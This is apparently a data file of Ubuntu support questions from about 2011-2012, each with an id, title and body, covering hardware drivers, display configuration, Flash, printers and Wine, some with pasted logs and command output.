97693	how can i get 11.04 to recognize my usb headset ?	i have a usb headset with microphone ( logitech , model number appears to be a-00009 ) that i ca n't seem to get ubuntu ( natty , 32-bit ) to recognize . the hardware is an asus k52f laptop . following is the output from dmesg when i plug the headset in : [ 528.093828 ] usb 2-1.2 : new full speed usb device using ehci_hcd and address 3 [ 528.165794 ] usb 2-1.2 : device descriptor read/64 , error -32 [ 528.341688 ] usb 2-1.2 : device descriptor read/64 , error -32 [ 528.517601 ] usb 2-1.2 : new full speed usb device using ehci_hcd and address 4 [ 528.589556 ] usb 2-1.2 : device descriptor read/64 , error -32 [ 528.765457 ] usb 2-1.2 : device descriptor read/64 , error -32 [ 528.941319 ] usb 2-1.2 : new full speed usb device using ehci_hcd and address 5 [ 529.348970 ] usb 2-1.2 : device not accepting address 5 , error -32 [ 529.421096 ] usb 2-1.2 : new full speed usb device using ehci_hcd and address 6 [ 529.828719 ] usb 2-1.2 : device not accepting address 6 , error -32 [ 529.828884 ] hub 2-1:1.0 : unable to enumerate usb device on port 2 i 've tried this also on 2 other linux machines : a desktop running debian squeeze and a netbook running oneiric . same result . i 've done a lot of googling , but most people having issues with usb sound devices appear to have gotten farther than this . where should i look next ?
97695	is there a lightweight tool to crop images quickly ?	i need to crop images often - photos , printscreens , etc. , and loading gimp for such a simple task takes way too long . can you recommend a more robust alternative ?
97711	can not connect to wireless network with a broadcom bcm4311 802.11b/g wlan card	i installed ubuntu on my old hp . it is the 11.10 version . i can not find out how to connect it to my wireless network . i ca n't even get it to scan for available networks . link to my pastebin : http : //pastebin.com/zjs9y6vq
97712	equivalent of command line 'shutdown -h +60 ' but for suspend to ram ?	what is the equivalent of a command line like 'shutdown -h +60 ' but for suspend to ram ? i would like to be able to send the laptop to suspend with a time delay , but i do n't know of the equivalent for it in a terminal command .
97713	how do you get the remote to work on my hauppage tv card ?	i 've installed mythbuntu and during the install i selected my hauppauge tv card and the remote does n't work . now what do i do ? i see a .lircrc file in my home dir but ps -ef|grep lirc yields nothing . i 've read on other posts that the kernel is now handling this but i do n't know what to try . irw is n't installed . how does a program get signals from the remote without lirc installed ? where are the config files i need to look at ? how can i debug this ?
97717	how can i get pygame for python3 ?	there is a package ( python-pygame ) for python2 available from the universe repository . however , i want to work through the tutorial in the invent with python book . going through spm ( synaptic ) , i can not find a pygame resource for python3 . also , i looked on the pygame website and it is not clear if pygame is available for python3 ( though the book indicates that it is ) . can someone help me with my dilemma ?
97720	how to configure wacom devices manually	in ubuntu 11.10 with xorg-1:7.6+7ubuntu7 and xserver-xorg-input-wacom 1:0.11.0-0ubuntu2 i 've put in xorg.conf : section `` inputdevice '' driver `` wacom '' identifier `` pen '' # `` eraser '' | '' finger '' | '' pad '' option `` device '' `` /dev/input/wacom '' option `` type '' `` stylus '' # `` eraser '' | '' touch '' | '' pad '' option `` floating '' `` on '' option `` mode '' `` absolute '' option `` rotate '' `` none '' endsection also i 've disbaled `` evdev tablet catchall '' in /usr/share/x11/xorg.conf.d/10-evdev.conf to prevent creating alot of mice . the option `` floating '' works well : $ xinput -- list ∼ pen id=6 [ floating slave ] ∼ eraser id=7 [ floating slave ] ∼ finger id=8 [ floating slave ] ∼ pad id=9 [ floating slave ] however , all wacom-related options are ignored : $ xsetwacom get pen all option `` mode '' `` relative '' option `` rotate '' `` half '' i have to run xsetwacom manually .
97726	gnome-tweak-tool settings wo n't apply	i change something in gnome-tweak-tool , but it wo n't apply . if i close gnome-tweak-tool and start it again , the settings are same as before . do you have any idea how to solve this , please ? i 'm using ubuntu 11.10 with gnome 3.2.1 and unity ( but that 's not relevant , i think ) . thanks . : )
97737	install wine on unconnected computer	i run ubuntu 10.10 currently on my desktop which is not connected to the wifi so i want to know if it possible to download wine in one package using my windows laptop to install on the desktop computer without running into dependency problems . thanks
97741	an exe file that i want to run on linux made for windows comes up as a trojan on virustotal - how would i run it without it affecting my system ?	is there any way that i can run this program on my linux system without possibly getting a virus ?
97747	value could not be retrieved . ( valueerror : can not convert float nan to integer )	i keep getting the above error when i activate my ubuntu one client ( the one that is installed by default ) . plus it keeps saying `` loading.. '' i am using ubuntu 11.10 freshly installed .
97748	how do i bind right click to a keyboard shortcut ?	my friend has a dell netbook with a twitchy touchpad and does n't really right click reliably ( the pointer moves as you right click ) . he would like to be able to do something like use a modifier key and normal left click and have that register as a right click in the ui . unfortunately this netbook does not have the typical right menu shortcut key on the keyboard . he is pretty sure this is not possible in standard gnome , but how about unity ? is this possible ?
97750	automatically run ls after changing path using autocd	so everytime i change the directory i would like the new path to automatically get listed with ls.there are solutions if the path gets changed using cd but i never found a solution that would work when the path gets changed using the autocd option . would be quite convenient , has anyone achieved that before ?
97755	why is chrome resolving domain names differently than ping which is resolving differently than ssh ?	when i go to me.com in chrome it tells me that domain ca n't be found . when i go to me.com with ssh , it connects to that server . when i try to ping me.com it pings localhost . i want me.com to resolve to localhost in all 3 situations . how can i accomplish this ? here are my relevant files : /etc/hosts 127.0.0.1 localhost.localdomain localhost me.com : :1 laptop localhost6.localdomain6 localhost6 127.0.1.1 laptop /etc/resolv.conf : # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten nameserver 127.0.0.1 nameserver 127.0.0.1 /etc/resolvconf/resolv.conf.d/head # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten nameserver 127.0.0.1
97756	release input automatically in vmware	player grabs the input when clicked inside , then the mouse pointer is locked within the player window and i have to press ctrl+alt for the player to release input . previously it all worked automagically , a few days ago , and i have n't changed the host ( 11.10 ) or guest ( win xp ) oss or anything drastic like that . maybe i have accidentally bumped some keystroke which disables the mouse pointer integration ? i ca n't find the setting to make it go back to how it used to work..
97760	what is the code of autorun.inf ?	i have just installed ubuntu lts ( lucid lynx ) 10.04.3 into my usb stick . but when i insert it to a computer in a computer shop , a program named autorun remover automatically removed the file autorun.inf , making ubuntu lts unusable . i want to make the file using notepad , but what is the code that i need to type ?
97772	how can i fix having to reinstall my wireless driver every time i reboot ?	i followed the info on a forum to get my netgear n300 wireless usb adapter to work and i installed the broadcom driver for it and it works fine until i reboot my system . every time i turn my computer back on it wont recognize my wireless card and i have to go into ndisgtk to install it again . not a big issue but it is annoying to have to reinstall the driver . if anyone can help that would be great . this is my first experience with ubuntu after hearing how easy it is to get into so if someone can give me some easy to follow instructions that would be awesome .
97773	lightweight local mail transfer agent	i 'd like to have a very lightweight and easy mail transfer agent on my server . the only purpose of this mta is to buffer outgoing email messages locally and forward them to isp 's mail servers . what options ubuntu offers ? criteria easy to configure for forwarding purposes simple - average user can understand how it works secure - outside traffic is disabled no incoming email support needed i have had various issues with sendmail and other complex solutions which are overkill for my modest needs .
97776	unmet dependencies : libqt4-dev qt4-qmake	is there anything i can do about this ? it seems that synaptic has updated qt4-qmake to version 4.7.2 but all the dependent packages need version 4.6.2 . doing `` sudo apt-get -f install libqt4-dev '' responds with : '' libqt4-dev : depends : qt4-qmake ( = 4:4.6.2-0ubuntu5.3 ) but 4:4.7.2-0ubuntu6.3 is to be installed ''
97777	how can i add templates to create different types of files	i want create different types of files , for exemple : txt , doc , xls , html etc . how can i add templates for this types ?
97780	how can i improve performance and user experience in 11.10 ( boot + shutdown time , graphics , ... )	i 've been dual-booting with ubuntu and windows since ubuntu 9.04 . this was the first time i used ubuntu and was really happy with it . the boot and shutdown time was very nice and much shorter than on windows vista . i was pretty satisfied with the general performance of ubuntu back then . as the versions passed , i noticed , that with every new release the performance is getting worse . i believe one reason could be unity , since it is still under development . i 'm also not really happy with this new ui direction everyone ( win8 , unity , gnome 3 ) is heading now . these big buttons and text fields as my screen would be a touchscreen . i would prefer the old ( but fast ) gnome 2.x . however this is a complete other topic . i read somewhere that the slow boot and shutdown could be about the network manager . the second thing is the graphic performance . unity and the general desktop environment is pretty slow , not that it 's unusable , but when i press or click somewhere i notice a little delay . games , compared to windows 7 , minecraft runs much smoother than on ubuntu . and a few other games too . i would like to know if there are any tweaks or something that i can improve the boot and shutdown time , graphics performance , etc . edit : bootchart ( large image ) my system : dell xps m1530 ubuntu 11.10 32bit intel ( r ) core ( tm ) 2 duo cpu t9300 @ 2.50ghz geforce 8600m gt 4gb ram
97781	is there an english-russian translator ?	can anybody recommend me english-russian translator for ubuntu 11.10 . i need to translate in program , not in web browser with online translators .
97787	hang on reboot due to `` unattended-upgrades in progress , sleeping for 5s '' error	ubuntu 11.10 hangs on reboot with message 'unattended-upgrades in progress , sleeping for 5s ' , but the wait is endless & you never reach the desktop . kindly suggest a remedy .
97788	how can i synchronize my funambol with thunderbird / lightning	under windows a simple addon exists with wich i can sync my funambol events and contacts with thunderbird and lightning . i could n't find such a tool for ubuntu yet but it would be very helpful for me .
97789	creating a gtk window with input shape mask in python	i am trying to create a gtk3 window with a custom input mask , so that the window would n't receive any mouse clicks . this is a piece of code that i 've came up with : surface = cairo.imagesurface ( cairo.format_argb32 , w , h ) surface_ctx = cairo.context ( surface ) surface_ctx.set_source_rgba ( 1.0 , 1.0 , 1.0 , 0.0 ) surface_ctx.set_operator ( cairo.operator_source ) surface_ctx.paint ( ) reg = gdk.cairo_region_create_from_surface ( surface ) widget.input_shape_combine_region ( reg ) unfortunately call to gdk.cairo_region_create_from_surface ( ) fails with this error : traceback ( most recent call last ) : file `` ../kazam/frontend/window_region.py '' , line 144 , in cb_draw reg = gdk.cairo_region_create_from_surface ( surface ) file `` /usr/lib/python2.7/dist-packages/gi/types.py '' , line 43 , in function return info.invoke ( *args , **kwargs ) typeerror : could n't find conversion for foreign struct 'cairo.region' after inspecting gdk-3.0.gir file i am somewhat baffled . clearly i am doing something wrong ( or there 's something wrong with introspection ? ) . any advice will be appreciated .
97790	assasins creed revelations with wine	i 've got ubuntu 11.10 , now i want to install assassins creed revelations through wine . will it work bettter than on windows xp ? will it affect my system in dangerous way ? : is it risky ? which version of wine should i use for that ? and if the game wo n't work properly , can i uninstall game and wine ?
97796	why is my video playback always bad ?	i am wondering , why is the hd video playback under linux so bad ? i mean , hd videos are laggy . i 've tested many distos , on multiple pcs , but compared to windows , the hd playback is always bad . laggy all the time , and the online video playback ? it 's much worse . i tried both nvidia and amd video cards , the latest official drivers , even the open source drivers , but the hd playback performance is ... ... amd e-300 with radeon hd6310 ( 384 mb of ram ) graphics , 4gb ddr3 . the gpu is integrated , but i can run hd content on windows without a problem , both locally and online , with flash player . i 've tried many distros . ubuntu , xubuntu , lubuntu , linux mint , arch linux , archbang , fedora , suse . they all have the same problem , laggy flash playback , even at 480p ! i really want to stick with linux , but i ca n't because of this fact . do you have any tips ? is there a secret that i do n't know ? just tell me please .
97801	google calendar at thunderbird , without mails - possible ?	i would like to have access to my google calendar under thunderbird , but i do n't want thunderbird to manage my mails from google . so , i want only calendar functionality , without the mail itself . is that possible ? i have thunderbird with provider for google calendar installed , i wanted to add an account only for the calendar , but i am afraid that when i create the account for gmail it will suck and catalogue my mails from gmail , what i do n't want .
97803	how can i see the partitions ?	how can i see each partition in ubuntu 11.10 , similar to how they 're displayed in microsoft windows ? information should be displayed for memory allocation . ( translated from german with the help of google translate and some guessing at what the question was asking for . see the first revision for the original question text . )
97807	how do i add icons to the desktop in 10.04 ?	i have setup ubuntu 10.04 and all i want to know is how to make a desktop top full of icons like windows ?
97810	how to make apache run as current user	i think for a development machine , its more convenient to run apache as the current user to simplify permissions problem ? how do i do that ? i think its suexec but how do i configure it in ubuntu+apache ?
97811	install printer driver from `` tar.gz '' file	i have samsung ml-1915 printer , the printer wizard which pop ups when i connected the printer could n't find the driver . so i download the driver from samsung website , and now i unzip the tar.gz and got this files what i need to do next ? ? ?
97814	how can i access the scanner functionality of my samsung clx 3175n over the network ?	i have a samsung clx 3175n network capable color laser printer/scanner which was sold as being linux compatible . whereas the printer undeed works in the network . it has been impossible up to now to get the scanner working under ubuntu ( safe for using windows xp running in virtualbox on the ubuntu client ) , but that is not my understanding of linux compatibility . is there anybody who knows a method to access a network scanner in ubuntu ?
97817	rsnapshot : using different intervals for different directories	is it possible to backup two different directories using two different intervals using rsnapshot ? for example , if i want to backup my /home directory every day , but my /archive directory once a month . or is that kind of moot point since rsnapshot only saves hard links if no changes are made ?
97825	supertuxkart not able to start	was working fine before i played around with nvidia drivers and ended up with this problem . i tried running it through the terminal and i see these messages : subsharm @ subsharm-thinkpad-t61 : ~ $ supertuxkart irrlicht engine version 1.7.2 linux 3.0.0-15-generic # 25-ubuntu smp mon jan 2 17:44:42 utc 2012 x86_64 [ filemanager ] data files will be fetched from : '/usr/share/games/supertuxkart/' [ irrdriver ] creating null device irrlicht engine version 1.7.2 linux 3.0.0-15-generic # 25-ubuntu smp mon jan 2 17:44:42 utc 2012 x86_64 [ irrdriver ] trying opengl rendering . [ irrdriver ] tring to create device with 32 bits xlib : extension `` glx '' missing on display `` :0.0 '' . [ irrdriver temp logger ] level 1 : no glx support available . opengl driver will not work . [ irrdriver temp logger ] level 2 : fatal error , could not get visual . segmentation fault subsharm @ subsharm-thinkpad-t61 : ~ $ sudo xorg -configure [ sudo ] password for subsharm : fatal server error : server is already active for display 0 if this server is no longer running , remove /tmp/.x0-lock and start again .
97826	setting custom commands for ebooks	i wanted to follow these instructions from another thread about reading ebooks : if you install calibre , and you just want to read a mobi file , then you can use the ebook-reader application that installed as part of the calibre package . to do this : right click on the mobi file and choose `` open with other application ... '' expand the arrow near the bottom that says `` use a custom command '' in the text box that appears , type `` /usr/bin/ebook-reader '' tick the box that says `` remember this application for `` mobipocket e-book '' files click on the `` open '' button unfortunately , that feature has disappeared/is n't available in my ubuntu 11.10 standard install . please can someone help me with a terminal command-line for this .
97828	how shutdown the computer from console with option to cancel ?	i want close the gnome session and shutdown the computer when the downloads finish but i want to show the shutdown window to can cancel it in some cases . i use : gnome-session-quit -- power-off -- force but this does n't work when the screen is in suspend mode . is this a bug or the normal behavior ? in gnome 2 this worked well even the screen is off . any idea ?
97830	how do i get evolution mail 's rss to work ?	playing around with evolution mail - it has some features that i like . i then downloaded the rss plugin from the software center . well , it did n't download because it gave me an error . simply , how do i install the rss plugin in 11.10 ?
97831	excessive hard disk access on secondary hdd , i 'm not accessing anything on it	i 've set up my ubuntu 11.10 on a ssd with an encrypted lvm . i 've attached another ext4 hdd , unencrypted , it 's automounted on /media/data and created videos , music , downloads and backups folders on it , removed the existing ones from my home folder and symlinked the new ones . my pc is constantly rattling from hard drive usage although i am not accessing any of those folders . like , create a new tab in chromium , 2 seconds of hd rattle . ll /etc ( which is on the ssd ) , 1 second of hd rattle . open new terminal window , 2 seconds of hd rattle and then it 's open . automatic backup is on , but set to run weekly . what is going on here ? did i mess something up ?
97840	looking for sport tournament software	i am looking for a tournament software for ubuntu/gnu linux . badminton . enter players , system . not using anything at the moment , but looking for something . sport software link through wine i managed to install and run : tournament planner
97847	how can i change tomboy note 's background colour ?	how to make tomboy notes have a different theme that are easier on the eyes like black font over a lightgrey background rather than a darkgrey font over a white background . i have explored tomboy 's preference window , toyed a bit with gnome `` appearance '' settings , and even tried to tweak the gtk+ code but nothing seems to work .
97848	how can i get my third screen ( laptop + two monitors ) running on w/ nvidia drivers ?	i 've got a laptop with geforce gtx 560m and i 'm using the nvidia drivers on ubuntu 11.10 to support the a second monitor with twinview , which works fine . when i run nvidia-settings , and connect my third monitor ( counting the laptop display ) , nvidia-settings freezes indefinitely if i select to use it as twinview , too . if i choose to display it as a separate x screen , save the settings , and restart , that setting is never applied . here is the xorg.conf created by nvidia on save : # nvidia-settings : x configuration file generated by nvidia-settings # nvidia-settings : version 285.05.09 ( buildd @ allspice ) wed nov 16 15:25:12 utc 2011 # commented out by update-manager , hal is now used and auto-detects devices # keyboard settings are now read from /etc/default/console-setup # section `` inputdevice '' # # # generated from default # identifier `` mouse0 '' # driver `` mouse '' # option `` protocol '' `` auto '' # option `` device '' `` /dev/psaux '' # option `` emulate3buttons '' `` no '' # option `` zaxismapping '' `` 4 5 '' # endsection # commented out by update-manager , hal is now used and auto-detects devices # keyboard settings are now read from /etc/default/console-setup # section `` inputdevice '' # # # generated from default # identifier `` keyboard0 '' # driver `` kbd '' # endsection section `` serverlayout '' # keyboard settings are now read from /etc/default/console-setup # inputdevice `` keyboard0 '' `` corekeyboard '' # commented out by update-manager , hal is now used and auto-detects devices # keyboard settings are now read from /etc/default/console-setup # inputdevice `` mouse0 '' `` corepointer '' # removed option `` xinerama '' `` 0 '' # removed option `` xinerama '' `` 1 '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 screen 1 `` screen1 '' rightof `` screen0 '' inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 0 '' # commented out by update-manager , hal is now used and auto-detects devices endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` unknown '' modelname `` len '' horizsync 56.5 - 67.8 vertrefresh 40.0 - 60.0 option `` dpms '' endsection section `` monitor '' identifier `` monitor1 '' vendorname `` unknown '' modelname `` samsung syncmaster '' horizsync 30.0 - 81.0 vertrefresh 56.0 - 75.0 option `` dpms '' # horizsync source : edid , vertrefresh source : edid endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gtx 560m '' option `` nologo '' `` true '' busid `` pci:1:0:0 '' screen 0 endsection section `` device '' identifier `` device1 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gtx 560m '' busid `` pci:1:0:0 '' screen 1 endsection section `` screen '' # removed option `` metamodes '' `` dfp-0 : nvidia-auto-select +0+0 '' # removed option `` metamodes '' `` dfp-0 : nvidia-auto-select +0+0 , dfp-2 : nvidia-auto-select +1920+0 '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` twinview '' `` 1 '' option `` twinviewxineramainfoorder '' `` dfp-0 '' option `` metamodes '' `` dfp-0 : 1920x1080 +0+0 , dfp-2 : 1680x1050 +1920+0 ; dfp-0 : 1920x1080 +0+0 , dfp-2 : null '' subsection `` display '' depth 24 endsubsection endsection section `` screen '' # removed option `` metamodes '' `` dfp-2 : nvidia-auto-select +0+0 '' # removed option `` metamodes '' `` dfp-1 : nvidia-auto-select +0+0 '' # removed option `` metamodes '' `` dfp-1 : 1680x1050 +0+0 '' # removed option `` metamodes '' `` dfp-1 : nvidia-auto-select +0+0 '' identifier `` screen1 '' device `` device1 '' monitor `` monitor1 '' defaultdepth 24 option `` twinview '' `` 0 '' option `` metamodes '' `` dfp-1 : 1680x1050_60 +0+0 '' subsection `` display '' depth 24 endsubsection endsection section `` extensions '' option `` composite '' `` disable '' endsection i 'm not very handy with x config . am i doing something wrong ?
97849	email address not accepted	i am trying to set up a ubuntu one account on my wife 's laptop . when we put her email address in , it will not accept it . i already have an account on my laptop and i ca n't remember having this problem when i set it up .
97852	flash refusing to render on ubuntu despite a successful install	been banging my head against the wall and god knows what . would appreciate some help on this one . i have ubuntu 11.10 , 64bit installed with firefox 9.0.1 and google chrome 16.0.912.75 . flash was installed via flash-aid ( firefox extension ) earlier and was working fine . about 7 hours back , i hit a bug on one of my programs and wanted to check whether it was a player issue . i decided to switch to a stable release via flash-aid . for some reason , the switch did n't work , so i tried to revert back to the beta release once again . no luck either . the funny thing is both firefox and chrome report that the flash player is installed . google chrome plugin tab flash - version : 11.2 r202 shockwave flash 11.2 r202 name : shockwave flash version : 11.2 r202 location : /usr/lib/mozilla/plugins/libflashplayer.so disable mime types : mime type description file extensions application/x-shockwave-flash shockwave flash .swf application/futuresplash futuresplash player .spl firefox plugin tab shockwave flash shockwave flash 11.2 r202 location of libflashplayer.so $ locate libflashplayer.so /usr/lib/firefox-addons/plugins/libflashplayer.so /usr/lib/mozilla/plugins/libflashplayer.so $ ls -altr /usr/lib/firefox- addons/plugins/libflashplayer.so lrwxrwxrwx 1 root root 42 2012-01-23 19:43 /usr/lib/firefox-addons/plugins/libflashplayer.so - > /usr/lib/mozilla/plugins/libflashplayer.so $ ls -altr /usr/lib/mozilla/plugins/libflashplayer.so -rw-r -- r -- 1 root root 19m 2011-12-17 20:32 /usr/lib/mozilla/plugins/libflashplayer.so $ ldd /usr/lib/mozilla/plugins/libflashplayer.so linux-vdso.so.1 = > ( 0x00007fffe2dff000 ) libgthread-2.0.so.0 = > /usr/lib/x86_64-linux-gnu/libgthread-2.0.so.0 ( 0x00007f7756633000 ) libx11.so.6 = > /usr/lib/x86_64-linux-gnu/libx11.so.6 ( 0x00007f77562fb000 ) libxext.so.6 = > /usr/lib/x86_64-linux-gnu/libxext.so.6 ( 0x00007f77560e7000 ) libxt.so.6 = > /usr/lib/x86_64-linux-gnu/libxt.so.6 ( 0x00007f7755e82000 ) librt.so.1 = > /lib/x86_64-linux-gnu/librt.so.1 ( 0x00007f7755c7a000 ) libxcursor.so.1 = > /usr/lib/x86_64-linux-gnu/libxcursor.so.1 ( 0x00007f7755a6f000 ) libxrender.so.1 = > /usr/lib/x86_64-linux-gnu/libxrender.so.1 ( 0x00007f7755864000 ) libssl3.so = > /usr/lib/x86_64-linux-gnu/libssl3.so ( 0x00007f775562a000 ) libsmime3.so = > /usr/lib/x86_64-linux-gnu/libsmime3.so ( 0x00007f77553fd000 ) libnss3.so = > /usr/lib/x86_64-linux-gnu/libnss3.so ( 0x00007f77550c5000 ) libnssutil3.so = > /usr/lib/x86_64-linux-gnu/libnssutil3.so ( 0x00007f7754ea6000 ) libplds4.so = > /usr/lib/x86_64-linux-gnu/libplds4.so ( 0x00007f7754ca1000 ) libplc4.so = > /usr/lib/x86_64-linux-gnu/libplc4.so ( 0x00007f7754a9c000 ) libnspr4.so = > /usr/lib/x86_64-linux-gnu/libnspr4.so ( 0x00007f7754861000 ) libpthread.so.0 = > /lib/x86_64-linux-gnu/libpthread.so.0 ( 0x00007f7754643000 ) libdl.so.2 = > /lib/x86_64-linux-gnu/libdl.so.2 ( 0x00007f775443f000 ) libgtk-x11-2.0.so.0 = > /usr/lib/x86_64-linux-gnu/libgtk-x11-2.0.so.0 ( 0x00007f7753e03000 ) libgdk-x11-2.0.so.0 = > /usr/lib/x86_64-linux-gnu/libgdk-x11-2.0.so.0 ( 0x00007f7753b50000 ) libatk-1.0.so.0 = > /usr/lib/x86_64-linux-gnu/libatk-1.0.so.0 ( 0x00007f775392e000 ) libpangoft2-1.0.so.0 = > /usr/lib/x86_64-linux-gnu/libpangoft2-1.0.so.0 ( 0x00007f7753703000 ) libgdk_pixbuf-2.0.so.0 = > /usr/lib/x86_64-linux-gnu/libgdk_pixbuf-2.0.so.0 ( 0x00007f77534e3000 ) libpangocairo-1.0.so.0 = > /usr/lib/x86_64-linux-gnu/libpangocairo-1.0.so.0 ( 0x00007f77532d6000 ) libcairo.so.2 = > /usr/lib/x86_64-linux-gnu/libcairo.so.2 ( 0x00007f7753018000 ) libpango-1.0.so.0 = > /usr/lib/x86_64-linux-gnu/libpango-1.0.so.0 ( 0x00007f7752dcd000 ) libfreetype.so.6 = > /usr/lib/x86_64-linux-gnu/libfreetype.so.6 ( 0x00007f7752b35000 ) libfontconfig.so.1 = > /usr/lib/x86_64-linux-gnu/libfontconfig.so.1 ( 0x00007f77528ff000 ) libgobject-2.0.so.0 = > /usr/lib/x86_64-linux-gnu/libgobject-2.0.so.0 ( 0x00007f77526ad000 ) libgmodule-2.0.so.0 = > /usr/lib/x86_64-linux-gnu/libgmodule-2.0.so.0 ( 0x00007f77524a9000 ) libglib-2.0.so.0 = > /lib/x86_64-linux-gnu/libglib-2.0.so.0 ( 0x00007f77521b3000 ) libm.so.6 = > /lib/x86_64-linux-gnu/libm.so.6 ( 0x00007f7751f2e000 ) libc.so.6 = > /lib/x86_64-linux-gnu/libc.so.6 ( 0x00007f7751b8f000 ) /lib64/ld-linux-x86-64.so.2 ( 0x00007f7757dba000 ) libxcb.so.1 = > /usr/lib/x86_64-linux-gnu/libxcb.so.1 ( 0x00007f7751973000 ) libsm.so.6 = > /usr/lib/x86_64-linux-gnu/libsm.so.6 ( 0x00007f775176a000 ) libice.so.6 = > /usr/lib/x86_64-linux-gnu/libice.so.6 ( 0x00007f7751550000 ) libxfixes.so.3 = > /usr/lib/x86_64-linux-gnu/libxfixes.so.3 ( 0x00007f775134a000 ) libz.so.1 = > /lib/x86_64-linux-gnu/libz.so.1 ( 0x00007f7751131000 ) libgio-2.0.so.0 = > /usr/lib/x86_64-linux-gnu/libgio-2.0.so.0 ( 0x00007f7750def000 ) libxinerama.so.1 = > /usr/lib/x86_64-linux-gnu/libxinerama.so.1 ( 0x00007f7750beb000 ) libxi.so.6 = > /usr/lib/x86_64-linux-gnu/libxi.so.6 ( 0x00007f77509db000 ) libxrandr.so.2 = > /usr/lib/x86_64-linux-gnu/libxrandr.so.2 ( 0x00007f77507d2000 ) libxcomposite.so.1 = > /usr/lib/x86_64-linux-gnu/libxcomposite.so.1 ( 0x00007f77505ce000 ) libxdamage.so.1 = > /usr/lib/x86_64-linux-gnu/libxdamage.so.1 ( 0x00007f77503cb000 ) libpixman-1.so.0 = > /usr/lib/x86_64-linux-gnu/libpixman-1.so.0 ( 0x00007f7750156000 ) libpng12.so.0 = > /lib/x86_64-linux-gnu/libpng12.so.0 ( 0x00007f774ff2f000 ) libxcb-shm.so.0 = > /usr/lib/x86_64-linux-gnu/libxcb-shm.so.0 ( 0x00007f774fd2c000 ) libxcb-render.so.0 = > /usr/lib/x86_64-linux-gnu/libxcb-render.so.0 ( 0x00007f774fb22000 ) libexpat.so.1 = > /lib/x86_64-linux-gnu/libexpat.so.1 ( 0x00007f774f8f8000 ) libffi.so.6 = > /usr/lib/x86_64-linux-gnu/libffi.so.6 ( 0x00007f774f6ef000 ) libpcre.so.3 = > /lib/x86_64-linux-gnu/libpcre.so.3 ( 0x00007f774f4b3000 ) libxau.so.6 = > /usr/lib/x86_64-linux-gnu/libxau.so.6 ( 0x00007f774f2b0000 ) libxdmcp.so.6 = > /usr/lib/x86_64-linux-gnu/libxdmcp.so.6 ( 0x00007f774f0a9000 ) libuuid.so.1 = > /lib/x86_64-linux-gnu/libuuid.so.1 ( 0x00007f774eea4000 ) libselinux.so.1 = > /lib/x86_64-linux-gnu/libselinux.so.1 ( 0x00007f774ec86000 ) libresolv.so.2 = > /lib/x86_64-linux-gnu/libresolv.so.2 ( 0x00007f774ea6a000 ) everything seems to be in order , but i am obviously missing something . i keep getting a `` missing plug-in '' message in chrome and a blank page in firefox . firebug inspect confirms that there is no embed in the dom . have also checked with youtube and metacafe but no luck . tried 'sudo apt-get install flashplugin-installer ' but it did n't work as well ( probably since i am on 64bit ) with : setting up flashplugin-installer ( 11.1.102.55ubuntu0.11.10.1 ) ... nspluginwrapper : no appropriate viewer found for /usr/lib/flashplugin-installer /libflashplayer.so dpkg : error processing flashplugin-installer ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : flashplugin-installer e : sub-process /usr/bin/dpkg returned an error code ( 1 )
97857	poor audio in blackboard collaborate ( elluminate live ) on ubuntu 11.10	i already have sun java ( not openjdk ) installed , but i 'm still having audio issues . openjdk did n't display the slides , which was fixed by sun java , but the audio was bad in both of them . is there any fix ? i have been looking for a long time .
97861	is there a derivative that uses a rolling release model ?	there were so many discussions about an ubuntu with rr . they were so many pros and contras . at the end ubuntu wont be changed , the 6 month cycle system wont be changed . thats fine ! but because there are so many people who would like to use an ubuntu with rr im asking myself why isnt there an ubuntu derivate with rr . i couldnt found one , there are a loooot of ubuntu derivates but no rr . is it just impossible ? i mean ubuntu = 6 months cycle , so the derivate have to be a 6 month cycle too ? is there no other option ? or are there already some smart guys trying to solve this problem ? thank you !
97863	how to pin apps to unity bar ?	i am a recently new ubuntu user and new some advice here . 3 part question below : 1st part : i was told that programs that are n't installed via apt-get and ubuntu software center should be put in the opt directory . is that correct ? 2nd part : the problem is that i ca n't pin any of those apps on the unity launch bar , which i would like very much to do . whenever i launch such a program ( ex . overture ide ) from the /opt/ directory from the terminal , and right click its icon on the unity bar there 's no option to `` keep it in launcher '' . how can i pin it then ? 3rd part : another question , for all the programs that i have installed on the /opt/ directory , none of them appear on the search bar ... should n't they appear there . how can i accomplish that ? thanks .
97868	intel hd audio codec power management	is it possible to enable power management for intel-hda sound card audio codec ? power management for the card itself works fine , but audio codec module ( /sys/module/snd_hda_codec ) does n't seem to expose any parameters for power management , although powertop utility suggests to enable it and shows its power usage , which is 100 % , always on top .
97869	how do i get my canon mx420 printer working ?	i was using canon mx420 printer properly until i upgrade my ubuntu to 11.10 . after that i can add it to my printers but i ca n't print or scan any page ! what should i do now ? sudo apt-get install cnijfilter-mx420series : reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : python-hachoir-parser nautilus-actions iat nautilus-image-converter pyrenamer nautilus-filename-repairer python-hachoir-metadata python-hachoir-core md5deep use 'apt-get autoremove ' to remove them . the following extra packages will be installed : cnijfilter-common the following new packages will be installed : cnijfilter-common cnijfilter-mx420series 0 upgraded , 2 newly installed , 0 to remove and 294 not upgraded . need to get 1,783 kb of archives . after this operation , 7,688 kb of additional disk space will be used . do you want to continue [ y/n ] ? y get:1 http : //ppa.launchpad.net/michael-gruz/canon/ubuntu/ oneiric/main cnijfilter-common amd64 3.50-2ubuntu4 [ 113 kb ] get:2 http : //ppa.launchpad.net/michael-gruz/canon/ubuntu/ oneiric/main cnijfilter-mx420series amd64 3.50-2ubuntu4 [ 1,670 kb ] fetched 1,783 kb in 